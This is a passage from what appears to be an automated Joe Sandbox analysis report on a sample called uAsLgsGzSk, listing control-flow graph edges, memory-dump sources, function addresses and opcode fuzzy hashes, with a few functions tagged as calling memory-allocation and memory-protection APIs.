430->434 431->432 436 7ffd9ba59e71-7ffd9ba59e77 432->436 437 7ffd9ba59ebe-7ffd9ba59ee2 433->437 438 7ffd9ba59eb9 433->438 434->433 435->436 439 7ffd9ba59e79-7ffd9ba59e7a 436->439 440 7ffd9ba59e25-7ffd9ba59e29 436->440 441 7ffd9ba59ee4 437->441 442 7ffd9ba59ee9-7ffd9ba59f0d 437->442 438->437 445 7ffd9ba59f27-7ffd9ba59f2c 439->445 443 7ffd9ba59e3d-7ffd9ba59e44 440->443 444 7ffd9ba59e2b-7ffd9ba59e3a 440->444 441->442 446 7ffd9ba59f14-7ffd9ba59f25 442->446 447 7ffd9ba59f0f 442->447 443->428 444->443 445->392 446->445 447->446
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a44fe80754948753998d36280298a46c94cd70cf8b1873dad56534774a4d7cd5
                                                                                                  • Instruction ID: be08885d8bb4a79dcf86a967e7a279fe2efd8d989aa0d101a01042dcf23aaec0
                                                                                                  • Opcode Fuzzy Hash: a44fe80754948753998d36280298a46c94cd70cf8b1873dad56534774a4d7cd5
                                                                                                  • Instruction Fuzzy Hash: DD120470E0421D8FDB18DFE8C495AEDBBF2FF48300F148569D41AEB259DA74AA85CB50
                                                                                                  Function 00007FFD9BA10D70 Relevance: .3, Instructions: 296COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 532 7ffd9ba10d70-7ffd9ba10d87 533 7ffd9ba10d89 532->533 534 7ffd9ba10d8a-7ffd9ba10dc9 532->534 533->534 536 7ffd9ba10dd0-7ffd9ba10e39 call 7ffd9ba107f8 534->536 537 7ffd9ba10dcb 534->537 546 7ffd9ba10e70-7ffd9ba10ebb 536->546 547 7ffd9ba10e3b-7ffd9ba10e6d 536->547 537->536 554 7ffd9ba10ebd-7ffd9ba10ed2 546->554 555 7ffd9ba10ed3-7ffd9ba10fb3 546->555 547->546 554->555 567 7ffd9ba10fbb-7ffd9ba110ac 555->567
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 495f97ee652bc317c079657ed2911e0117d417c9732689de1c2f1e32c00264e2
                                                                                                  • Instruction ID: 4f3b625f9e77ec66fb297233ee2a3ee790a237253a7831333e642075be9dc5ff
                                                                                                  • Opcode Fuzzy Hash: 495f97ee652bc317c079657ed2911e0117d417c9732689de1c2f1e32c00264e2
                                                                                                  • Instruction Fuzzy Hash: D8A15BB1A1EA9D8EE798DB6CC8657AD7FE1EF59310F0401BED04AD72D6CA752801C740
                                                                                                  Function 00007FFD9BA221CE Relevance: 1.7, APIs: 1, Instructions: 193memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: bdcdfc0c80a75c3ca64641de7ed6b1c099e16addb301bcbfdfe41cc8d6da7241
                                                                                                  • Instruction ID: 0c51bc7732fbeff26c47760fd221c6510f8781d73380b4830906a78a45ae84c2
                                                                                                  • Opcode Fuzzy Hash: bdcdfc0c80a75c3ca64641de7ed6b1c099e16addb301bcbfdfe41cc8d6da7241
                                                                                                  • Instruction Fuzzy Hash: 6F518D70D0974D8FDB54DFA8C885AEDBBF0FB6A300F1042AAD449E3255DB74A885CB80
                                                                                                  Function 00007FFD9BA23BBD Relevance: 1.4, APIs: 1, Instructions: 189memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 13 7ffd9ba23bbd-7ffd9ba23cf3 VirtualAlloc 18 7ffd9ba23cf5 13->18 19 7ffd9ba23cfb-7ffd9ba23d5f 13->19 18->19
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA16000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA16000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba16000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 04334b865bcade119506b8c18ccbf3942e995c234a713e6bf58307cde0311a0b
                                                                                                  • Instruction ID: ebab0df94e77fc39c41d71e5df42a9d147204d78cbb29e1d7ba7372027bba743
                                                                                                  • Opcode Fuzzy Hash: 04334b865bcade119506b8c18ccbf3942e995c234a713e6bf58307cde0311a0b
                                                                                                  • Instruction Fuzzy Hash: 3E513A70908A5C8FDF94EF68C845BE9BBF1FB69310F1081AAD04DE3255CB71A9858B80
                                                                                                  Function 00007FFD9BA26772 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -
                                                                                                  • API String ID: 0-2547889144
                                                                                                  • Opcode ID: 974ea4011422f4116ae2bb0d4fc074aafd6595abf53421d61ced30fb13771895
                                                                                                  • Instruction ID: 35bf9bc234e66a0cf24edf75e1cdd2b099ba5afd4a1efe16d54f4aaab46f4b35
                                                                                                  • Opcode Fuzzy Hash: 974ea4011422f4116ae2bb0d4fc074aafd6595abf53421d61ced30fb13771895
                                                                                                  • Instruction Fuzzy Hash: D7215C70E4A51E8FDBB8DB58C854BF877B4EB18300F1100B9D50DA36A1DEB42AC09F40
                                                                                                  Function 00007FFD9BA2696B Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 242 7ffd9ba2696b-7ffd9ba26974 244 7ffd9ba2697f-7ffd9ba269be 242->244 246 7ffd9ba267fe-7ffd9ba26805 244->246 247 7ffd9ba269c4-7ffd9ba269ce 244->247 248 7ffd9ba26825-7ffd9ba26e5c 246->248 249 7ffd9ba26807-7ffd9ba26c2b 246->249 247->246 248->246 249->246 254 7ffd9ba26c31-7ffd9ba26c3b 249->254 254->246
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -
                                                                                                  • API String ID: 0-2547889144
                                                                                                  • Opcode ID: 41b9186abcca438b81178a92608d24544d3609f42b168350bf853d4576f439ca
                                                                                                  • Instruction ID: 99d4c08ba15629872c0d5cf27b230d71f9169ff68b8d2a2d5ee46daf0c4740a4
                                                                                                  • Opcode Fuzzy Hash: 41b9186abcca438b81178a92608d24544d3609f42b168350bf853d4576f439ca
                                                                                                  • Instruction Fuzzy Hash: 5301E970E4555E8FDBB5DB188855BE8B6B4EB58300F1141FAD01DD2291DAB42AC48F40
                                                                                                  Function 00007FFD9BA5CC2D Relevance: .4, Instructions: 415COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e7d0ebd54b5a8d91333b3168cc1c6a525eb599334f7775f694a63bec31addc7a
                                                                                                  • Instruction ID: 65be86cbd4e996b436496ecff7f02f993eb5cce6600db5cb02fd6677844e34eb
                                                                                                  • Opcode Fuzzy Hash: e7d0ebd54b5a8d91333b3168cc1c6a525eb599334f7775f694a63bec31addc7a
                                                                                                  • Instruction Fuzzy Hash: F6F18F71E1965D8FDBA8DB98C8A17ACB7E1FF58300F0541B9D40DD3296DEB86A84CB40
                                                                                                  Function 00007FFD9BA5CD9D Relevance: .2, Instructions: 203COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e02f6b447574086b2552dde732e73fd73ec8d46357c5b6ec4a57352ea4d1083
                                                                                                  • Instruction ID: 37475d5ceadd158c73c2114a0c0591fccb1e300cc519c7a990d93efaa33a6f2c
                                                                                                  • Opcode Fuzzy Hash: 2e02f6b447574086b2552dde732e73fd73ec8d46357c5b6ec4a57352ea4d1083
                                                                                                  • Instruction Fuzzy Hash: 6B715E71E19A4D8FDB98EF98C8A1BACB7A2FF54300F0541B9D00ED7296DE756984CB00
                                                                                                  Function 00007FFD9BA28AB9 Relevance: .1, Instructions: 141COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 692 7ffd9ba28ab9-7ffd9ba28b04 694 7ffd9ba28b06 692->694 695 7ffd9ba28b0b-7ffd9ba28b11 692->695 694->695 696 7ffd9ba28be5-7ffd9ba28beb 695->696 697 7ffd9ba28bf1-7ffd9ba28bfa 696->697 698 7ffd9ba28b16-7ffd9ba28b4c 696->698 700 7ffd9ba28b52-7ffd9ba28bbf 698->700 705 7ffd9ba28bdd-7ffd9ba28be2 700->705 706 7ffd9ba28bc1-7ffd9ba28bca 700->706 705->696 706->705 707 7ffd9ba28bcc-7ffd9ba28bdc 706->707
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0391782144bf13edf9e1f9fdba0d307acd1f81dc23973760149d4c20b98b03e7
                                                                                                  • Instruction ID: cd727e46226d3f5d9f93432861723682e68eb1e487304b17cb7c30f814943e92
                                                                                                  • Opcode Fuzzy Hash: 0391782144bf13edf9e1f9fdba0d307acd1f81dc23973760149d4c20b98b03e7
                                                                                                  • Instruction Fuzzy Hash: 6E51A070A0964D9FCF84EF98D494AED7BF1FF59310F0A01AAE409E7261D674E990CB90
                                                                                                  Function 00007FFD9BA10C25 Relevance: .1, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe096cff44d5dd731b6d33f3c448cd761673a55c54afbe91cd39922126973986
                                                                                                  • Instruction ID: e84a7fc606b28a69d10ba131925fbb3ac786ca04a94d0be55680d5afd7bdfbb6
                                                                                                  • Opcode Fuzzy Hash: fe096cff44d5dd731b6d33f3c448cd761673a55c54afbe91cd39922126973986
                                                                                                  • Instruction Fuzzy Hash: 1D313331F0E68E8BE761ABA8C8212FD77A0EF51310F051676C155962E2DAB82605CB85
                                                                                                  Function 00007FFD9BA28749 Relevance: .1, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30a228b4fd89159208f155a4a10ac489afa68cfdf68280670f983ea55e4ac7c4
                                                                                                  • Instruction ID: f8f23d9679ebee565bff1f665b7ebd108798b9ff2e997a15c299cff69d0db9bb
                                                                                                  • Opcode Fuzzy Hash: 30a228b4fd89159208f155a4a10ac489afa68cfdf68280670f983ea55e4ac7c4
                                                                                                  • Instruction Fuzzy Hash: B2317C34A0964D8FDB54DF58C8A5AEE7BF1FF58314F06026AE849E3291CB74E940CB81
                                                                                                  Function 00007FFD9BA5B0F0 Relevance: .1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eb642a559b9e5a7be907d992889436f73da6c705ea3a8abf4f5410223755e40a
                                                                                                  • Instruction ID: 1f6c650b775bd1e72ddd8c33366cbb389a2352c0acbba33394640d028d41b2dd
                                                                                                  • Opcode Fuzzy Hash: eb642a559b9e5a7be907d992889436f73da6c705ea3a8abf4f5410223755e40a
                                                                                                  • Instruction Fuzzy Hash: DE31F570A19A4D9FDB94EFD8C4A5ABDBBF1FF68301F44017AD409D72A1DAB46980CB40
                                                                                                  Function 00007FFD9BA5B494 Relevance: .1, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d766b54e3743b300f8f536707fb9079af159f6a7d9402eeb71f74bf8f326cfb7
                                                                                                  • Instruction ID: 99b929e44231023c04da4ae9b870bf8ef9c064466ab6e79ce237eac8bf3622af
                                                                                                  • Opcode Fuzzy Hash: d766b54e3743b300f8f536707fb9079af159f6a7d9402eeb71f74bf8f326cfb7
                                                                                                  • Instruction Fuzzy Hash: 6F311870E0960D8AEB78DF88C4A57FCB7B1FF59301F5141BAD40E93291CAB82A81CB01
                                                                                                  Function 00007FFD9BA1116D Relevance: .1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b70e28d4779d55f8ced1e93b8ab66020acd2193de13170828e7e19467b73a396
                                                                                                  • Instruction ID: a81b55ab434de1b14c729d98a4adb5f2d605b2955f1e97fa69ec9f771a25c513
                                                                                                  • Opcode Fuzzy Hash: b70e28d4779d55f8ced1e93b8ab66020acd2193de13170828e7e19467b73a396
                                                                                                  • Instruction Fuzzy Hash: E521EE31A1991E8FEB94EBA8C8A49BDB7F1FF68300B11057AD409D72A1DF74A941CB40
                                                                                                  Function 00007FFD9BA61B30 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c34171a4de6b9208c13914fbf8539c74944b51af29787454375ca65b55283332
                                                                                                  • Instruction ID: e9d2c9635a9c6b0a4bb2359d9da28b9d57e5c8cf1d474906790bb9543f2ea603
                                                                                                  • Opcode Fuzzy Hash: c34171a4de6b9208c13914fbf8539c74944b51af29787454375ca65b55283332
                                                                                                  • Instruction Fuzzy Hash: E311D535B0924D9FEB05FF68E495DE93BA0EF15324F0401BBD45D8A093DA36A584CB84
                                                                                                  Function 00007FFD9BA5AB91 Relevance: .1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50e1107dd7b3446636637c6ebe175bf5b58d9e7d8863d0335decf20e1b4147b3
                                                                                                  • Instruction ID: 7ec7409bb99de02c8010dd6c7ad1e867c74a225ad86c3b4099bf79980e3945af
                                                                                                  • Opcode Fuzzy Hash: 50e1107dd7b3446636637c6ebe175bf5b58d9e7d8863d0335decf20e1b4147b3
                                                                                                  • Instruction Fuzzy Hash: 2D11C831A0958D9FDB54EFA8C8695ED7BB1FF54300F0640ABE44DC71A2DE75AA40CB40
                                                                                                  Function 00007FFD9BA5C4C5 Relevance: .1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f44df024e309628094d3593282876d715284e9d1b742ec6088605b1ec3217ab2
                                                                                                  • Instruction ID: 6d6b8db3e09c31cc575e94f27a7e963634f5a44f4779b42f151dec74545a6a07
                                                                                                  • Opcode Fuzzy Hash: f44df024e309628094d3593282876d715284e9d1b742ec6088605b1ec3217ab2
                                                                                                  • Instruction Fuzzy Hash: B511E53190954D9FDB94EFA8C865AED7BB0FF65300F0501A6E00CC31A5EA74AA80CB40
                                                                                                  Function 00007FFD9BA3151C Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53d82ae931af2bf1a0d57be4e86258381ac660543c2cb32362db664a615dc8b6
                                                                                                  • Instruction ID: 4e05fcff41190f237b64d088ec39cd29e6fe7b3588411ca537f52840d16f5265
                                                                                                  • Opcode Fuzzy Hash: 53d82ae931af2bf1a0d57be4e86258381ac660543c2cb32362db664a615dc8b6
                                                                                                  • Instruction Fuzzy Hash: CB112630E1921E8FEBA0DF95C8947EDB3B0FF24301F1141B6D41A962A5CAB86A81CF40
                                                                                                  Function 00007FFD9BA5C7B9 Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20cfca0ce27d273ac39f2d8f807860b2b8e58c384b058b888dd6c94c019c7c12
                                                                                                  • Instruction ID: 33ad47f2e7d647bbfedc629cf39d9a744fb2a2937b35b76b91347b53f169774e
                                                                                                  • Opcode Fuzzy Hash: 20cfca0ce27d273ac39f2d8f807860b2b8e58c384b058b888dd6c94c019c7c12
                                                                                                  • Instruction Fuzzy Hash: D211287090978D8FCB45DF58C8555EE3BF0FF69304F0501AAE859D72A1D774A940CB81
                                                                                                  Function 00007FFD9BA303A9 Relevance: .1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2aa4b805623bf974d11f1de07a08a8c6ac649e7382568c9b3a8d6985d252f140
                                                                                                  • Instruction ID: 1128e582f5059f88a4a0f9eb51a63072ebdade2a663e5e260a398ed30059d8eb
                                                                                                  • Opcode Fuzzy Hash: 2aa4b805623bf974d11f1de07a08a8c6ac649e7382568c9b3a8d6985d252f140
                                                                                                  • Instruction Fuzzy Hash: A7112E7090968D8FCF45EF68C895AED7BF0FF29304F0501AAE459D71A1D734A554CB81
                                                                                                  Function 00007FFD9BA10C48 Relevance: .1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba10000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 90079fa9237b9d83118d2889525777496bc31bcce7336dde6feb369f9827cdfd
                                                                                                  • Instruction ID: b2f8c2abe48dc9b9bdff454117c9816716cb6a3c6e517f5aff022bbbb7600baf
                                                                                                  • Opcode Fuzzy Hash: 90079fa9237b9d83118d2889525777496bc31bcce7336dde6feb369f9827cdfd
                                                                                                  • Instruction Fuzzy Hash: 8C014935E0E68E8FE721ABA4C8202E977B0EF45710F054676D551972E1CB782204CB85
                                                                                                  Function 00007FFD9BA288E1 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 429b8597105fa3c2cdc4cc5a358f2664bed505b7b7383d549262f8e1f777bdd8
                                                                                                  • Instruction ID: 250e91fa0e2138ed5948117d908de9b79bbd8d709e17f2495277d7a66e254807
                                                                                                  • Opcode Fuzzy Hash: 429b8597105fa3c2cdc4cc5a358f2664bed505b7b7383d549262f8e1f777bdd8
                                                                                                  • Instruction Fuzzy Hash: 76011A70A2968DCFCB44EF18C895AD93BF0FF68754F0501A6E849C7251DB34E951CB81
                                                                                                  Function 00007FFD9BA5AB19 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae2a4704187b103944654fa4c897c201a091124afdea3e9187910dd8181be824
                                                                                                  • Instruction ID: b0b15ce633f77f14326d4474a4e019cd55b06f72fa3a4e1db522426e96a7dfe2
                                                                                                  • Opcode Fuzzy Hash: ae2a4704187b103944654fa4c897c201a091124afdea3e9187910dd8181be824
                                                                                                  • Instruction Fuzzy Hash: 93112A3090868D8FCF45EF68C859AEE7BB0FF29304F05059AE859D7261D7349954CB81
                                                                                                  Function 00007FFD9BA2813D Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba26000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 82ccb27d8f1828cb2dffd80ad7eb611ecfab652d2646144a9ca4f75c31c67359
                                                                                                  • Instruction ID: 0d01050a100982e864ea859504008db4d3e01da78035e337929840f26ccec339
                                                                                                  • Opcode Fuzzy Hash: 82ccb27d8f1828cb2dffd80ad7eb611ecfab652d2646144a9ca4f75c31c67359
                                                                                                  • Instruction Fuzzy Hash: 27012821E9E68D8AE720AB6488211FCB7E0EF45320F4600B7E14D922D2DF7861158741
                                                                                                  Function 00007FFD9BA5AD40 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA58000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA58000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba58000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 196e1394ec368dca8baab9bc3db91bb74ce3f05509ef780bacddcd417760f51b
                                                                                                  • Instruction ID: 723606b2c2b48c413c885f16f239146d1d1c4beecf0ee610b0daf59d428415cf
                                                                                                  • Opcode Fuzzy Hash: 196e1394ec368dca8baab9bc3db91bb74ce3f05509ef780bacddcd417760f51b
                                                                                                  • Instruction Fuzzy Hash: 4A01C57091464D8FCB44EF58C855AEE77F0FB68305F01062AA85AE3254DB75AA50CB81
                                                                                                  Function 00007FFD9BA5C529 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
